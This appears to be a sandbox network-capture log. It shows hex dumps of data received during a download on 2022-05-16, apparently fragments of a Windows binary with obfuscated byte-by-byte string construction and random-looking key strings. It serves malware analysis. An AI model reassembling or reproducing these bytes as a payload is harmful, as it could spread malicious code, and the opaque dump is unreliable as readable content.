2022-05-16 08:29:53 UTC	5789	IN	Data Raw: ff ff 20 c6 85 8d dc ff ff a7 c6 85 8e dc ff ff 2d c6 85 8f dc ff ff a7 c6 85 90 dc ff ff e5 c6 85 91 dc ff ff d7 c6 85 92 dc ff ff dd c6 85 93 dc ff ff 31 c6 85 94 dc ff ff 5c c6 85 95 dc ff ff a5 c6 85 96 dc ff ff 08 c6 85 97 dc ff ff 74 c6 85 98 dc ff ff 82 c6 85 99 dc ff ff 07 c6 85 9a dc ff ff db c6 85 9b dc ff ff 92 c6 85 9c dc ff ff 1a c6 85 9d dc ff ff d6 c6 85 9e dc ff ff 35 c6 85 9f dc ff ff 92 c6 85 a0 dc ff ff ec c6 85 a1 dc ff ff 61 c6 85 a2 dc ff ff 16 c6 85 a3 dc ff ff 74 c6 85 a4 dc ff ff ae c6 85 a5 dc ff ff 08 c6 85 a6 dc ff ff 83 c6 85 a7 dc ff ff cc c6 85 a8 dc ff ff 85 c6 85 a9 dc ff ff 80 c6 85 aa dc ff ff 69 c6 85 ab dc ff ff 7b c6 85 ac dc ff ff d8 c6 85 ad dc ff ff 6e c6 85 ae dc ff ff f8 c6 85 af dc ff ff 08 c6 85 b0 dc ff ff 5c Data Ascii: -1\t5ati{n\
2022-05-16 08:29:53 UTC	5805	IN	Data Raw: 85 b1 e5 ff ff 01 c6 85 b2 e5 ff ff 74 c6 85 b3 e5 ff ff c5 c6 85 b4 e5 ff ff 33 c6 85 b5 e5 ff ff 31 c6 85 b6 e5 ff ff 2c c6 85 b7 e5 ff ff a3 c6 85 b8 e5 ff ff 11 c6 85 b9 e5 ff ff a3 c6 85 ba e5 ff ff 55 c6 85 bb e5 ff ff d0 c6 85 bc e5 ff ff 69 c6 85 bd e5 ff ff 35 c6 85 be e5 ff ff 3e c6 85 bf e5 ff ff a0 c6 85 c0 e5 ff ff c6 c6 85 c1 e5 ff ff 71 c6 85 c2 e5 ff ff 35 c6 85 c3 e5 ff ff 02 c6 85 c4 e5 ff ff 85 c6 85 c5 e5 ff ff 97 c6 85 c6 e5 ff ff b1 c6 85 c7 e5 ff ff d2 c6 85 c8 e5 ff ff c8 c6 85 c9 e5 ff ff 96 c6 85 ca e5 ff ff 6c c6 85 cb e5 ff ff 65 c6 85 cc e5 ff ff 62 c6 85 cd e5 ff ff 70 c6 85 ce e5 ff ff f5 c6 85 cf e5 ff ff 04 c6 85 d0 e5 ff ff f2 c6 85 d1 e5 ff ff c0 c6 85 d2 e5 ff ff 39 c6 85 d3 e5 ff ff 8c c6 85 d4 e5 ff ff 12 c6 85 d5 e5 Data Ascii: t31,Ui5>q5lebp9
2022-05-16 08:29:53 UTC	5821	IN	Data Raw: ff 04 c6 85 d6 ee ff ff 89 c6 85 d7 ee ff ff 5d c6 85 d8 ee ff ff 98 c6 85 d9 ee ff ff 8c c6 85 da ee ff ff c8 c6 85 db ee ff ff 04 c6 85 dc ee ff ff 73 c6 85 dd ee ff ff c0 c6 85 de ee ff ff 9d c6 85 df ee ff ff 34 c6 85 e0 ee ff ff 60 c6 85 e1 ee ff ff a6 c6 85 e2 ee ff ff 50 c6 85 e3 ee ff ff a6 c6 85 e4 ee ff ff 0d c6 85 e5 ee ff ff d5 c6 85 e6 ee ff ff d1 c6 85 e7 ee ff ff 33 c6 85 e8 ee ff ff bb c6 85 e9 ee ff ff a6 c6 85 ea ee ff ff a9 c6 85 eb ee ff ff 77 c6 85 ec ee ff ff 30 c6 85 ed ee ff ff 04 c6 85 ee ee ff ff 9a c6 85 ef ee ff ff 91 c6 85 f0 ee ff ff 5c c6 85 f1 ee ff ff d5 c6 85 f2 ee ff ff 00 c6 85 f3 ee ff ff 91 c6 85 f4 ee ff ff c8 c6 85 f5 ee ff ff 62 c6 85 f6 ee ff ff e9 c6 85 f7 ee ff ff 76 c6 85 f8 ee ff ff b4 c6 85 f9 ee ff ff 05 c6 Data Ascii: ]s4`P3w0\bv
2022-05-16 08:29:53 UTC	5837	IN	Data Raw: ff 0f be 11 85 d2 75 02 eb 02 eb ba 0f b6 85 fd 72 f3 ff 83 f8 01 75 56 0f 57 c0 66 0f 13 85 60 66 f3 ff eb 1e 8b 8d 60 66 f3 ff 83 c1 01 8b 95 64 66 f3 ff 83 d2 00 89 8d 60 66 f3 ff 89 95 64 66 f3 ff 83 bd 64 66 f3 ff 00 77 22 72 0c 81 bd 60 66 f3 ff ca 67 00 00 73 14 66 8b 85 40 72 f3 ff 66 83 c0 01 66 89 85 40 72 f3 ff eb b7 0f b6 8d fd 72 f3 ff 83 f9 01 75 52 c7 85 c0 6b f3 ff 00 00 00 00 eb 0f 8b 95 c0 6b f3 ff 83 c2 01 89 95 c0 6b f3 ff 8b 85 28 6c f3 ff 50 e8 56 57 03 00 83 c4 04 39 85 c0 6b f3 ff 7d 20 8b 8d 28 6c f3 ff 83 c1 01 89 8d 28 6c f3 ff 8b 95 28 6c f3 ff 0f be 02 85 c0 75 02 eb 02 eb ba 0f b6 8d fd 72 f3 ff 83 f9 01 75 53 0f 57 c0 66 0f 13 85 58 66 f3 ff eb 1e 8b 95 58 66 f3 ff 83 c2 01 8b 85 5c 66 f3 ff 83 d0 00 89 95 58 66 f3 ff 89 85 Data Ascii: uruVWf`f`fdf`fdfdfw"r`fgsf@rff@rruRkkk(lPVW9k} (l(l(luruSWfXfXf\fXf
2022-05-16 08:29:53 UTC	5853	IN	Data Raw: 8b 45 08 83 c0 21 89 85 d8 fe ff ff 8b 4d 08 83 c1 60 89 8d d4 fe ff ff 8b 55 08 83 c2 0f 89 55 e4 8b 45 08 05 bf 00 00 00 89 85 d0 fe ff ff 8b 4d 08 81 c1 c6 00 00 00 89 8d cc fe ff ff 8b 55 08 83 c2 49 89 95 f8 fd ff ff 8b 45 08 83 c0 19 89 85 f4 fd ff ff 8b 4d 08 83 c1 43 89 8d 0c fd ff ff 8b 55 08 81 c2 ad 00 00 00 89 95 08 fd ff ff 8b 45 08 83 c0 0a 89 45 e0 8b 4d 08 83 c1 44 89 8d c8 fe ff ff 8b 55 08 83 c2 49 89 95 04 fd ff ff 8b 45 08 83 c0 52 89 45 94 8b 4d 08 83 c1 30 89 8d f0 fd ff ff 8b 55 08 81 c2 af 00 00 00 89 95 00 fd ff ff 8b 45 08 83 c0 6c 89 85 ec fd ff ff 8b 4d 08 81 c1 c5 00 00 00 89 8d fc fc ff ff 8b 55 08 83 c2 15 89 95 e8 fd ff ff 8b 45 08 83 c0 21 89 85 f8 fc ff ff 8b 4d 08 81 c1 85 00 00 00 89 8d c4 fe ff ff 8b 55 08 83 c2 0f 89 Data Ascii: E!M`UUEMUIEMCUEEMDUIEREM0UElMUE!MU
2022-05-16 08:29:53 UTC	5869	IN	Data Raw: ff ff 8b 45 08 83 c0 7e 89 45 a8 8b 4d 08 83 c1 2b 89 8d 58 fc ff ff 8b 55 08 83 c2 0e 89 95 54 fc ff ff 8b 45 08 83 c0 75 89 85 f8 fd ff ff 8b 4d 08 83 c1 7a 89 8d 50 fc ff ff 8b 55 08 81 c2 91 00 00 00 89 95 2c ff ff ff 8b 45 08 83 c0 05 89 85 f4 fd ff ff 8b 4d 08 83 c1 03 89 8d 4c fc ff ff 8b 55 08 83 c2 16 89 95 f0 fd ff ff 8b 45 08 05 af 00 00 00 89 85 28 ff ff ff 8b 4d 08 83 c1 70 89 8d 48 fc ff ff 8b 55 08 83 c2 02 89 95 24 ff ff ff 8b 45 08 05 a1 00 00 00 89 85 ec fd ff ff 8b 4d 08 81 c1 9a 00 00 00 89 8d 20 ff ff ff 8b 55 08 81 c2 a9 00 00 00 89 55 a4 8b 45 08 05 c5 00 00 00 89 85 e8 fd ff ff 8b 4d 08 81 c1 9e 00 00 00 89 8d 44 fc ff ff 8b 55 08 83 c2 65 89 95 e4 fd ff ff 8b 45 08 05 99 00 00 00 89 85 40 fc ff ff 8b 4d 08 83 c1 4f 89 8d 3c fc ff Data Ascii: E~EM+XUTEuMzPU,EMLUE(MpHU$EM UUEMDUeE@MO<
2022-05-16 08:29:53 UTC	5885	IN	Data Raw: 83 c1 1b 89 8d b4 fc ff ff 8b 55 08 83 c2 43 89 95 18 ff ff ff 8b 45 08 83 c0 5c 89 85 b0 fc ff ff 8b 4d 08 83 c1 33 89 8d f0 fd ff ff 8b 55 08 81 c2 c6 00 00 00 89 95 ec fd ff ff 8b 45 08 05 aa 00 00 00 89 45 fc 8b 4d 08 81 c1 c7 00 00 00 89 8d ac fc ff ff 8b 55 08 81 c2 ba 00 00 00 89 55 f8 8b 45 08 83 c0 40 89 85 a8 fc ff ff 8b 4d 08 83 c1 31 89 8d e8 fd ff ff 8b 55 08 83 c2 1c 89 95 e4 fd ff ff 8b 45 08 83 c0 77 89 85 e0 fd ff ff 8b 4d 08 83 c1 7e 89 8d dc fd ff ff 8b 55 08 83 c2 08 89 95 14 ff ff ff 8b 45 08 83 c0 02 89 85 d8 fd ff ff 8b 4d 08 83 c1 71 89 8d d4 fd ff ff 8b 55 08 83 c2 11 89 95 10 ff ff ff 8b 45 08 05 9d 00 00 00 89 85 d0 fd ff ff 8b 4d 08 83 c1 7b 89 8d a4 fc ff ff 8b 55 08 83 c2 3c 89 55 b8 8b 45 08 83 c0 69 89 85 cc fd ff ff 8b 4d Data Ascii: UCE\M3UEEMUUE@M1UEwM~UEMqUEM{U<UEiM
2022-05-16 08:29:53 UTC	5901	IN	Data Raw: ff 8b 45 08 83 c0 2c 89 85 54 ff ff ff 8b 4d 08 83 c1 10 89 8d dc fd ff ff 8b 55 08 83 c2 0e 89 95 d8 fd ff ff 8b 45 08 05 86 00 00 00 89 85 d4 fd ff ff 8b 4d 08 81 c1 c6 00 00 00 89 8d 4c fc ff ff 8b 55 08 83 c2 09 89 95 48 fc ff ff 8b 45 08 83 c0 43 89 85 44 fc ff ff 8b 4d 08 81 c1 9e 00 00 00 89 8d 40 fc ff ff 8b 55 08 83 c2 28 89 95 3c fc ff ff 8b 45 08 05 ab 00 00 00 89 85 38 fc ff ff 8b 4d 08 83 c1 71 89 8d d0 fd ff ff 8b 55 08 83 c2 1a 89 95 34 fc ff ff 8b 45 08 05 a1 00 00 00 89 85 30 fc ff ff 8b 4d 08 83 c1 0b 89 8d cc fd ff ff 8b 55 08 83 c2 5e 89 95 50 ff ff ff 8b 45 08 83 c0 25 89 85 2c fc ff ff 8b 4d 08 83 c1 0d 89 8d 4c ff ff ff 8b 55 08 83 c2 59 89 95 28 fc ff ff 8b 45 08 83 c0 73 89 85 c8 fd ff ff 8b 4d 08 83 c1 57 89 8d c4 fd ff ff 8b 55 Data Ascii: E,TMUEMLUHECDM@U(<E8MqU4E0MU^PE%,MLUY(EsMWU
2022-05-16 08:29:53 UTC	5917	IN	Data Raw: ff 8b 4d 08 81 c1 86 00 00 00 89 8d 2c ff ff ff 8b 55 08 81 c2 c4 00 00 00 89 95 78 fe ff ff 8b 45 08 05 bc 00 00 00 89 85 60 fd ff ff 8b 4d 08 83 c1 25 89 8d 74 fe ff ff 8b 55 08 81 c2 bb 00 00 00 89 55 a8 8b 45 08 83 c0 2f 89 85 50 fc ff ff 8b 4d 08 83 c1 0f 89 8d 70 fe ff ff 8b 55 08 83 c2 15 89 55 a4 8b 45 08 05 9e 00 00 00 89 85 6c fe ff ff 8b 4d 08 81 c1 97 00 00 00 89 8d 68 fe ff ff 8b 55 08 81 c2 a7 00 00 00 89 95 5c fd ff ff 8b 45 08 05 94 00 00 00 89 85 58 fd ff ff 8b 4d 08 83 c1 0b 89 4d a0 8b 55 08 83 c2 7a 89 95 28 ff ff ff 8b 45 08 83 c0 0d 89 85 24 ff ff ff 8b 4d 08 81 c1 c6 00 00 00 89 8d 64 fe ff ff 8b 55 08 83 c2 4c 89 95 60 fe ff ff 8b 45 08 83 c0 66 89 85 5c fe ff ff 8b 4d 08 83 c1 6d 89 8d 54 fd ff ff 8b 55 08 81 c2 9e 00 00 00 89 95 Data Ascii: M,UxE`M%tUUE/PMpUUElMhU\EXMMUz(E$MdUL`Ef\MmTU
2022-05-16 08:29:53 UTC	5933	IN	Data Raw: 08 05 88 00 00 00 89 85 40 fe ff ff 8b 4d 08 83 c1 24 89 8d 1c fd ff ff 8b 55 08 81 c2 a8 00 00 00 89 95 3c fe ff ff 8b 45 08 83 c0 68 89 85 38 fe ff ff 8b 4d 08 83 c1 69 89 8d 18 fd ff ff 8b 55 08 83 c2 1d 89 95 34 fe ff ff 8b 45 08 05 a7 00 00 00 89 45 8c 8b 4d 08 81 c1 a3 00 00 00 89 8d 08 ff ff ff 8b 55 08 83 c2 32 89 95 14 fd ff ff 8b 45 08 83 c0 6b 89 45 d4 8b 4d 08 83 c1 61 89 8d 48 fc ff ff 8b 55 08 83 c2 72 89 55 88 8b 45 08 05 b8 00 00 00 89 85 10 fd ff ff 8b 4d 08 81 c1 be 00 00 00 89 8d 30 fe ff ff 8b 55 08 83 c2 62 89 95 04 ff ff ff 8b 45 08 83 c0 19 89 85 2c fe ff ff 8b 4d 08 83 c1 10 89 8d 0c fd ff ff 8b 55 08 83 c2 04 89 95 44 fc ff ff 8b 45 08 83 c0 5d 89 85 00 ff ff ff 8b 4d 08 83 c1 43 89 8d 08 fd ff ff 8b 55 08 81 c2 9e 00 00 00 89 95 Data Ascii: @M$U<Eh8MiU4EEMU2EkEMaHUrUEM0UbE,MUDE]MCU
2022-05-16 08:29:53 UTC	5949	IN	Data Raw: 17 89 95 f0 fc ff ff 8b 45 08 05 b5 00 00 00 89 85 20 fc ff ff 8b 4d 08 83 c1 49 89 8d 2c fe ff ff 8b 55 08 83 c2 30 89 95 28 fe ff ff 8b 45 08 83 c0 6c 89 85 24 fe ff ff 8b 4d 08 83 c1 65 89 8d 14 ff ff ff 8b 55 08 83 c2 7f 89 95 10 ff ff ff 8b 45 08 83 c0 0a 89 85 ec fc ff ff 8b 4d 08 83 c1 46 89 8d 20 fe ff ff 8b 55 08 81 c2 96 00 00 00 89 95 1c fc ff ff 8b 45 08 83 c0 75 89 85 0c ff ff ff 8b 4d 08 83 c1 0c 89 8d e8 fc ff ff 8b 55 08 83 c2 54 89 95 08 ff ff ff 8b 45 08 83 c0 0e 89 85 1c fe ff ff 8b 4d 08 81 c1 c4 00 00 00 89 8d e4 fc ff ff 8b 55 08 81 c2 ac 00 00 00 89 95 04 ff ff ff 8b 45 08 83 c0 0c 89 85 18 fe ff ff 8b 4d 08 83 c1 66 89 8d 18 fc ff ff 8b 55 08 83 c2 77 89 95 14 fe ff ff 8b 45 08 83 c0 60 89 85 10 fe ff ff 8b 4d 08 83 c1 05 89 8d e0 Data Ascii: E MI,U0(El$MeUEMF UEuMUTEMUEMfUwE`M
2022-05-16 08:29:53 UTC	5965	IN	Data Raw: 0f af 85 54 fe ff ff 89 45 ec 8b 8d a8 fe ff ff 0f af 8d 64 fd ff ff 89 8d 64 ff ff ff 8b 95 58 fd ff ff 3b 55 a4 7c 0f 8b 45 8c 03 85 5c ff ff ff 89 85 04 ff ff ff 8b 8d f0 fd ff ff 0f af 8d 08 ff ff ff 89 4d e0 8b 55 e8 0f af 95 f0 fd ff ff 89 95 38 ff ff ff 8b 85 d4 fd ff ff 0f af 85 40 fd ff ff 89 85 dc fe ff ff 8b 8d 64 fe ff ff 0f af 4d f4 89 8d 60 fe ff ff 8b 95 cc fe ff ff 3b 95 40 ff ff ff 7c 0f 8b 45 f0 03 85 a0 fe ff ff 89 85 40 ff ff ff 8b 8d ac fc ff ff 3b 8d ac fe ff ff 7c 0c 8b 95 0c fe ff ff 03 55 f4 89 55 b4 8b 85 e4 fe ff ff 3b 45 ac 7c 12 8b 8d b0 fe ff ff 03 8d a4 fe ff ff 89 8d 20 ff ff ff 8b 95 7c ff ff ff 0f af 95 18 ff ff ff 89 95 9c fd ff ff 8b 45 f0 3b 45 fc 7f 12 8b 8d 68 ff ff ff 03 8d 5c ff ff ff 89 8d 50 fe ff ff 8b 55 e8 3b Data Ascii: TEddX;U\|E\MU8@dM`;@\|E@;\|UU;E\| \|E;Eh\PU;
2022-05-16 08:29:53 UTC	5981	IN	Data Raw: 95 d4 fe ff ff 7c 0f 8b 85 50 ff ff ff 03 85 c0 fe ff ff 89 45 a4 8b 8d 98 fd ff ff 3b 8d 54 ff ff ff 7f 12 8b 95 14 ff ff ff 03 95 b4 fe ff ff 89 95 b4 fc ff ff 8b 45 a4 0f af 45 ec 89 85 40 ff ff ff 8b 8d a0 fe ff ff 3b 8d 48 ff ff ff 7f 0c 8b 55 b4 03 95 b8 fe ff ff 89 55 88 8b 85 20 ff ff ff 3b 85 cc fe ff ff 7c 0f 8b 4d e8 03 8d e8 fd ff ff 89 8d 04 ff ff ff 8b 95 40 fd ff ff 0f af 55 b0 89 55 84 8b 85 28 ff ff ff 0f af 85 f8 fd ff ff 89 85 b8 fe ff ff 8b 4d e0 3b 8d 70 fe ff ff 7f 0c 8b 55 ac 03 55 fc 89 95 54 fe ff ff 8b 85 94 fd ff ff 0f af 85 bc fe ff ff 89 85 f4 fd ff ff 8b 8d 8c fd ff ff 0f af 4d d8 89 4d f8 8b 95 a4 fd ff ff 0f af 95 b4 fd ff ff 89 95 20 fe ff ff 8b 85 2c ff ff ff 3b 45 d0 7f 0f 8b 8d 38 fd ff ff 03 8d 50 fe ff ff 89 4d a0 8b Data Ascii: \|PE;TEE@;HUU ;\|M@UU(M;pUUTMM ,;E8PM
2022-05-16 08:29:53 UTC	5997	IN	Data Raw: 4d 90 8b 55 08 81 c2 a6 00 00 00 89 55 8c 8b 45 08 83 c0 4c 89 85 40 fe ff ff 8b 4d 08 83 c1 3e 89 8d 2c ff ff ff 8b 55 08 81 c2 91 00 00 00 89 95 1c fd ff ff 8b 45 08 83 c0 4e 89 45 88 8b 4d 08 81 c1 c2 00 00 00 89 8d 28 ff ff ff 8b 55 08 83 c2 35 89 95 18 fd ff ff 8b 45 08 05 c0 00 00 00 89 85 58 fc ff ff 8b 4d 08 83 c1 27 89 8d 3c fe ff ff 8b 55 08 83 c2 09 89 95 24 ff ff ff 8b 45 08 83 c0 22 89 85 14 fd ff ff 8b 4d 08 81 c1 85 00 00 00 89 8d 10 fd ff ff 8b 55 08 81 c2 ba 00 00 00 89 95 0c fd ff ff 8b 45 08 05 a8 00 00 00 89 85 54 fc ff ff 8b 4d 08 81 c1 97 00 00 00 89 8d 38 fe ff ff 8b 55 08 81 c2 b4 00 00 00 89 95 20 ff ff ff 8b 45 08 83 c0 6e 89 85 1c ff ff ff 8b 4d 08 83 c1 70 89 4d d4 8b 55 08 81 c2 ba 00 00 00 89 95 18 ff ff ff 8b 45 08 05 af 00 Data Ascii: MUUEL@M>,UENEM(U5EXM'<U$E"MUETM8U EnMpMUE
2022-05-16 08:29:53 UTC	6013	IN	Data Raw: 81 c1 ba 00 00 00 89 4d c8 8b 55 08 81 c2 c8 00 00 00 89 95 c0 fc ff ff 8b 45 08 05 c0 00 00 00 89 85 44 ff ff ff 8b 4d 08 83 c1 3c 89 8d 30 fe ff ff 8b 55 08 83 c2 0e 89 95 bc fc ff ff 8b 45 08 83 c0 18 89 85 2c fe ff ff 8b 4d 08 81 c1 80 00 00 00 89 8d 40 ff ff ff 8b 55 08 81 c2 a7 00 00 00 89 95 b8 fc ff ff 8b 45 08 83 c0 7e 89 85 28 fe ff ff 8b 4d 08 81 c1 af 00 00 00 89 4d c4 8b 55 08 83 c2 37 89 95 b4 fc ff ff 8b 45 08 83 c0 5a 89 85 3c ff ff ff 8b 4d 08 83 c1 17 89 8d b0 fc ff ff 8b 55 08 81 c2 83 00 00 00 89 95 24 fe ff ff 8b 45 08 05 9a 00 00 00 89 85 ac fc ff ff 8b 4d 08 81 c1 a7 00 00 00 89 8d 20 fe ff ff 8b 55 08 81 c2 c6 00 00 00 89 55 c0 8b 45 08 83 c0 10 89 85 38 ff ff ff 8b 4d 08 83 c1 69 89 8d 1c fe ff ff 8b 55 08 81 c2 a9 00 00 00 89 95 Data Ascii: MUEDM<0UE,M@UE~(MMU7EZ<MU$EM UUE8MiU
2022-05-16 08:29:53 UTC	6029	IN	Data Raw: 03 85 d0 fd ff ff 03 85 cc fd ff ff 03 45 88 03 85 fc fe ff ff 03 85 c8 fd ff ff 03 85 a0 fc ff ff 03 85 9c fc ff ff 03 85 f8 fe ff ff 03 45 e4 03 45 e0 03 85 c4 fd ff ff 03 85 c0 fd ff ff 03 85 bc fd ff ff 03 85 b8 fd ff ff 03 85 f4 fe ff ff 03 85 b4 fd ff ff 03 45 84 03 85 98 fc ff ff 03 45 80 03 85 f0 fe ff ff 03 85 b0 fd ff ff 03 85 ac fd ff ff 03 85 7c ff ff ff 03 85 ec fe ff ff 03 85 a8 fd ff ff 03 85 94 fc ff ff 03 85 78 ff ff ff 03 85 90 fc ff ff 03 85 a4 fd ff ff 03 85 74 ff ff ff 03 85 8c fc ff ff 03 85 88 fc ff ff 03 85 a0 fd ff ff 03 85 70 ff ff ff 03 85 e8 fe ff ff 03 85 84 fc ff ff 03 85 9c fd ff ff 03 85 6c ff ff ff 03 85 98 fd ff ff 03 85 94 fd ff ff 03 85 e4 fe ff ff 03 85 90 fd ff ff 03 85 e0 fe ff ff 03 85 8c fd ff ff 03 85 80 fc ff ff Data Ascii: EEEEE\|xtpl
2022-05-16 08:29:53 UTC	6045	IN	Data Raw: e8 fe ff ff 83 c2 01 89 95 e8 fe ff ff 8b 85 4c ff ff ff 50 e8 de 17 00 00 83 c4 04 39 85 e8 fe ff ff 7d 20 8b 8d 4c ff ff ff 83 c1 01 89 8d 4c ff ff ff 8b 95 4c ff ff ff 0f be 02 85 c0 75 02 eb 02 eb ba 0f b6 4d bf 83 f9 01 75 50 0f 57 c0 66 0f 13 85 5c fe ff ff eb 1e 8b 95 5c fe ff ff 83 c2 01 8b 85 60 fe ff ff 83 d0 00 89 95 5c fe ff ff 89 85 60 fe ff ff 83 bd 60 fe ff ff 00 77 1c 72 0c 81 bd 5c fe ff ff 05 66 00 00 73 0e 66 8b 4d ac 66 83 c1 01 66 89 4d ac eb bd 0f b6 55 bf 83 fa 01 75 52 c7 85 e4 fe ff ff 00 00 00 00 eb 0f 8b 85 e4 fe ff ff 83 c0 01 89 85 e4 fe ff ff 8b 8d 34 ff ff ff 51 e8 2a 17 00 00 83 c4 04 39 85 e4 fe ff ff 7d 20 8b 95 34 ff ff ff 83 c2 01 89 95 34 ff ff ff 8b 85 34 ff ff ff 0f be 08 85 c9 75 02 eb 02 eb ba 0f b6 55 bf 83 fa 01 Data Ascii: LP9} LLLuMuPWf\\`\``wr\fsfMffMUuR4Q*9} 444uU
2022-05-16 08:29:53 UTC	6061	IN	Data Raw: f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
2022-05-16 08:29:53 UTC	6077	IN	Data Raw: 00 73 00 2d 00 55 00 59 00 00 00 61 00 72 00 2d 00 42 00 48 00 00 00 65 00 73 00 2d 00 50 00 59 00 00 00 61 00 72 00 2d 00 51 00 41 00 00 00 65 00 73 00 2d 00 42 00 4f 00 00 00 65 00 73 00 2d 00 53 00 56 00 00 00 65 00 73 00 2d 00 48 00 4e 00 00 00 65 00 73 00 2d 00 4e 00 49 00 00 00 65 00 73 00 2d 00 50 00 52 00 00 00 7a 00 68 00 2d 00 43 00 48 00 54 00 00 00 00 00 73 00 72 00 00 00 00 00 00 00 00 00 48 80 9e 00 42 00 00 00 60 cf 9e 00 2c 00 00 00 20 df 9e 00 71 00 00 00 00 ce 9e 00 00 00 00 00 2c df 9e 00 d8 00 00 00 38 df 9e 00 da 00 00 00 44 df 9e 00 b1 00 00 00 50 df 9e 00 a0 00 00 00 5c df 9e 00 8f 00 00 00 68 df 9e 00 cf 00 00 00 74 df 9e 00 d5 00 00 00 80 df 9e 00 d2 00 00 00 8c df 9e 00 a9 00 00 00 98 df 9e 00 b9 00 00 00 a4 df 9e 00 c4 00 00 00 Data Ascii: s-UYar-BHes-PYar-QAes-BOes-SVes-HNes-NIes-PRzh-CHTsrHB`, q,8DP\ht
2022-05-16 08:29:53 UTC	6093	IN	Data Raw: 17 3c 0a e6 78 45 bd 00 00 00 00 fe ff cb be f2 83 43 71 54 52 3b bd 00 00 00 80 fe ff c7 be bb f8 e2 85 e1 64 47 bd 00 00 00 20 ff ff c1 be a6 12 47 d8 c0 67 4c bd 00 00 00 40 ff ff b7 be 5f 68 d0 0d 25 05 3f bd 00 00 00 80 ff ff a7 be 0c 0e 8e 53 53 b5 40 bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 b8 b3 62 d4 7f c4 3f ee 57 64 96 a6 c3 79 3e 63 b4 8b 2a 47 50 b5 bf 07 41 69 46 43 2e d6 bf 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 00 00 35 33 fb a9 3d 16 f0 3f b7 cd b8 9a 29 61 9b 3c 61 80 77 3e 9a 2c f0 3f 5d 08 5b 53 83 90 71 bc 85 7f 6e e8 15 43 f0 3f 6e c9 77 19 1c a3 90 bc 74 85 15 d3 b0 59 f0 3f 65 b4 75 a4 e2 73 8d 3c de f6 dd 29 6b 70 f0 3f 26 3c b1 e2 df 91 8c bc c8 9b 75 18 45 87 f0 3f ff 84 b2 4b be 86 61 3c 83 f3 c6 ca 3e 9e f0 3f Data Ascii: <xECqTR;dG GgL@_h%?SS@b?Wdy>c*GPAiFC.?53=?)a<aw>,?][SqnC?nwtY?eus<)kp?&<uE?Ka<>?
2022-05-16 08:29:53 UTC	6109	IN	Data Raw: 6c 71 5a 4b 00 00 00 43 49 62 4d 4a 4d 32 6a 44 4f 79 51 57 50 4a 52 32 76 39 34 67 62 71 74 4d 72 45 4f 5a 74 69 61 57 31 39 64 62 51 51 54 6a 31 62 65 5a 6a 56 4c 7a 67 44 6f 7a 4f 46 55 34 35 78 49 4a 77 71 6b 33 5a 52 57 5a 34 4b 47 6e 00 00 00 61 72 42 46 75 63 4c 77 59 6e 00 00 74 37 6a 37 4d 47 53 71 71 69 51 52 46 66 5a 38 32 42 55 77 35 72 6e 62 36 68 46 6d 76 55 52 36 4e 5a 6f 39 6f 6d 68 46 46 6e 70 6c 38 33 4d 58 6d 61 6b 59 54 54 4f 72 41 64 36 38 39 43 6d 48 54 74 79 64 67 67 46 61 66 00 00 00 6d 6a 4e 6b 52 62 6c 62 49 6e 65 57 4f 56 74 6e 6b 72 4e 45 68 75 4b 75 55 52 6a 6f 4c 44 50 48 6d 50 00 00 45 75 72 54 56 65 4c 5a 78 51 68 4f 46 72 76 56 44 35 78 30 30 4c 46 45 50 68 4a 4f 4e 36 30 74 6d 7a 71 55 35 73 4e 5a 38 4b 58 50 59 43 79 67 Data Ascii: lqZKCIbMJM2jDOyQWPJR2v94gbqtMrEOZtiaW19dbQQTj1beZjVLzgDozOFU45xIJwqk3ZRWZ4KGnarBFucLwYnt7j7MGSqqiQRFfZ82BUw5rnb6hFmvUR6NZo9omhFFnpl83MXmakYTTOrAd689CmHTtydggFafmjNkRblbIneWOVtnkrNEhuKuURjoLDPHmPEurTVeLZxQhOFrvVD5x00LFEPhJON60tmzqU5sNZ8KXPYCyg
2022-05-16 08:29:53 UTC	6125	IN	Data Raw: 36 34 74 62 75 32 35 6a 6a 5a 58 56 4f 65 41 7a 77 6e 41 62 6a 4a 56 4d 7a 50 30 4d 4d 48 71 7a 49 63 74 73 52 44 75 77 48 4e 36 35 64 77 67 36 54 61 63 46 65 38 62 39 00 00 00 00 00 00 00 64 4a 63 73 64 61 4d 57 54 59 6c 38 31 33 6c 4c 4b 68 74 39 75 41 65 69 38 72 56 74 58 4a 4f 41 59 30 51 30 6e 74 79 39 41 47 56 33 73 55 79 32 70 76 75 4c 74 33 78 69 48 66 74 6e 36 62 54 6f 44 6b 6d 4e 41 50 32 73 61 00 00 00 00 00 00 00 77 71 38 61 7a 4e 44 6b 41 71 46 30 73 54 41 4d 47 36 44 46 65 4d 35 38 5a 6a 7a 4a 75 51 70 53 76 39 6c 56 55 6b 45 42 4d 34 6d 32 73 30 47 75 66 64 6b 70 67 5a 67 51 49 55 6c 45 68 74 47 5a 77 32 48 73 53 6b 61 46 68 00 00 00 00 00 00 00 43 49 62 4d 4a 4d 32 6a 44 4f 79 51 57 50 4a 52 32 76 39 34 67 62 71 74 4d 72 45 4f 5a 74 69 61 Data Ascii: 